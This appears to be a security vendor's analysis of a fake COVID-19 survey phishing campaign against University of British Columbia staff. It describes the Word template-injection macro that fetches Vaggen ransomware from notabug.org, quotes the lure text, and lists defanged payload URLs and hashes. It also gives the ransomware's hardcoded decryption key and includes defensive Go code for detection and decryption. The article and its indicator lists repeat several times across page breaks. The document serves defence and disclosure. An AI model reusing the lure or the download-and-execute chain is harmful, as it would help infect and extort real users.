3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3079 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3080 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3081 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3082 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3083 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3084 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3085 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3086 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3087 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3088 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3089 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
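Because the lure relies on a remote attachedTemplate relationship, the injection is visible in the package metadata before any macro runs. The Go program below is an added example, not part of the original analysis or Malwarebytes' tooling: it pulls word/_rels/settings.xml.rels out of a .docx and flags attachedTemplate relationships whose target is an http(s) URL; the relationship XML and the template-host.invalid URL in it are constructed test data.

```go
package main

import (
	"archive/zip"
	"encoding/xml"
	"fmt"
	"io"
	"os"
	"strings"
)

// Constructed example of the relationship part Word stores as
// word/_rels/settings.xml.rels. A benign document's attachedTemplate points
// at a local file:/// path; an http(s) target with TargetMode="External" is
// the template-injection pattern used by the phishing document. The host
// below is a placeholder, not the real notabug.org location.
const sampleSettingsRels = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://template-host.invalid/template.dotm" TargetMode="External"/>
</Relationships>`

const settingsRelsPath = "word/_rels/settings.xml.rels"

type relationship struct {
	ID         string `xml:"Id,attr"`
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

type relationships struct {
	Rels []relationship `xml:"Relationship"`
}

// RemoteTemplates parses a .rels part and returns the target of every
// attachedTemplate relationship that is fetched over HTTP(S) from outside
// the package. Local templates (file:/// targets) are not reported.
func RemoteTemplates(rels []byte) ([]string, error) {
	var doc relationships
	if err := xml.Unmarshal(rels, &doc); err != nil {
		return nil, err
	}
	var hits []string
	for _, r := range doc.Rels {
		if !strings.HasSuffix(r.Type, "/attachedTemplate") {
			continue
		}
		target := strings.ToLower(strings.TrimSpace(r.Target))
		remote := strings.HasPrefix(target, "http://") || strings.HasPrefix(target, "https://")
		if r.TargetMode == "External" && remote {
			hits = append(hits, r.Target)
		}
	}
	return hits, nil
}

// ScanDocx opens a .docx/.dotm package (a zip) and reports remote attached
// templates. It needs no Office installation, so it can run on a mail
// gateway or in triage before the document is ever opened.
func ScanDocx(path string) ([]string, error) {
	zr, err := zip.OpenReader(path)
	if err != nil {
		return nil, err
	}
	defer zr.Close()
	for _, f := range zr.File {
		if f.Name != settingsRelsPath {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		return RemoteTemplates(data)
	}
	return nil, nil // no settings relationships part: no attached template at all
}

func main() {
	if len(os.Args) > 1 {
		hits, err := ScanDocx(os.Args[1])
		fmt.Println(hits, err)
		return
	}
	hits, err := RemoteTemplates([]byte(sampleSettingsRels))
	fmt.Println(hits, err)
}
```

A hit on a document that arrived from outside the organisation is a strong signal on its own, since a remote template is fetched before the user sees any macro prompt.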
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to see whether it was successful (on success, the return value is the task ID of the executed application)\r\nIf successful, it sends a GET HTTP request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET HTTP request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -> main_enumDir\r\nmain_ELDBJORT -> main_encryptFile\r\nmain_SPRINGA -> main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function path/filepath.Walk.\r\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here.
Using a hardcoded key and a 12 byte long nonce generated by CryptGenRandom, the file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 byte long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs
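Returning to the Vaggen file format from the ransomware section above (12-byte nonce, ciphertext, 16-byte GCM tag, all under one hardcoded AES-256 key), recovery needs nothing from the attacker. The Go program below is an added example, not the malware's code and not Malwarebytes' decryptor: RecoverVaggenFile parses one .VAGGEN blob and authenticates it with gcm.Open, RecoverTree walks a directory with path/filepath.Walk and writes each recovered file beside its encrypted copy, and makeFixture is test scaffolding that builds a blob in the documented layout so the decryptor can be checked offline.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// The 32-byte AES-256 key the analysis found hardcoded in the sample.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

const (
	nonceSize = 12        // AES-GCM nonce, stored at the start of the file
	tagSize   = 16        // GCM tag appended by gcm.Seal, at the end of the file
	vaggenExt = ".VAGGEN" // extension added to every encrypted file
)

// RecoverVaggenFile takes the raw content of a .VAGGEN file, laid out as
// nonce || ciphertext || tag (what gcm.Seal emits when the nonce is passed as
// the destination prefix), and returns the plaintext. A wrong key or a damaged
// file fails GCM authentication instead of yielding garbage.
func RecoverVaggenFile(blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	block, err := aes.NewCipher(vaggenKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // 12-byte nonce, 16-byte tag by default
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceSize], blob[nonceSize:]
	return gcm.Open(nil, nonce, sealed, nil)
}

// makeFixture builds a constructed .VAGGEN-style blob in the documented layout
// so the decryptor can be exercised offline. Scaffolding for this example only.
func makeFixture(plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(vaggenKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil { // stands in for CryptGenRandom
		return nil, err
	}
	// Sealing with nonce as dst prefix yields nonce || ciphertext || tag.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// RecoverTree walks root with path/filepath.Walk and writes each *.VAGGEN file
// back under its original name. The encrypted copy is left in place as
// evidence; files that fail authentication are reported, never overwritten.
func RecoverTree(root string) (recovered int, failed []string, err error) {
	err = filepath.Walk(root, func(path string, info os.FileInfo, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if info.IsDir() || !strings.HasSuffix(path, vaggenExt) {
			return nil
		}
		blob, readErr := os.ReadFile(path)
		if readErr != nil {
			return readErr
		}
		plain, openErr := RecoverVaggenFile(blob)
		if openErr != nil {
			failed = append(failed, path)
			return nil
		}
		recovered++
		return os.WriteFile(strings.TrimSuffix(path, vaggenExt), plain, 0o600)
	})
	return recovered, failed, err
}

func main() {
	if len(os.Args) > 1 {
		n, failed, err := RecoverTree(os.Args[1])
		fmt.Printf("recovered %d file(s), %d failed authentication, err=%v\n", n, len(failed), err)
		return
	}
	// No directory given: self-check against a constructed fixture.
	blob, _ := makeFixture([]byte("quarterly report"))
	plain, err := RecoverVaggenFile(blob)
	fmt.Printf("%q %v\n", plain, err)
}
```

Because GCM authenticates, a file produced by a variant with a different key fails with an error rather than decrypting to garbage, which is the check to run before trusting any recovered output.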
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3111 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3112 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3113 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3114 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3115 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3116 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3117 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3118 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3119 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3120 of 